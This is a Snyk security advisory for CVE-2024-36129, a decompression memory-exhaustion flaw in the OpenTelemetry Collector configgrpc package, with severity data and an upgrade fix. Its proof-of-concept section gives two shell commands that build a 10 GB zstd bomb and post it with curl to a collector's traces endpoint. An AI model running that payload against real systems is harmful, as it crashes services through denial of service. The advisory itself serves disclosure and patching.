Improper Restriction of Operations within the Bounds of a Memory Buffer Affecting github.com/open-telemetry/opentelemetry-collector/config/configgrpc package, versions <0.102.1


Severity

Recommended
0.0
high
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of concept
EPSS
0.06% (29th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk IDSNYK-GOLANG-GITHUBCOMOPENTELEMETRYOPENTELEMETRYCOLLECTORCONFIGCONFIGGRPC-7216106
  • published6 Jun 2024
  • disclosed5 Jun 2024
  • creditMiroslav Stampar

Introduced: 5 Jun 2024

CVE-2024-36129  (opens in a new tab)
CWE-119  (opens in a new tab)

How to fix?

Upgrade github.com/open-telemetry/opentelemetry-collector/config/configgrpc to version 0.102.1 or higher.

Overview

github.com/open-telemetry/opentelemetry-collector/config/configgrpc is a package that defines the gRPC configuration settings.

Affected versions of this package are vulnerable to Improper Restriction of Operations within the Bounds of a Memory Buffer via the decompression process. An attacker can crash the system by sending specially crafted payloads that exploit the decompression logic to consume excessive memory resources.

PoC

dd if=/dev/zero bs=1G count=10 | zstd > poc.zst
curl -vv "http://192.168.0.107:4318/v1/traces" -H "Content-Type: application/x-protobuf" -H "Content-Encoding: zstd" --data-binary @poc.zst

CVSS Scores

version 3.1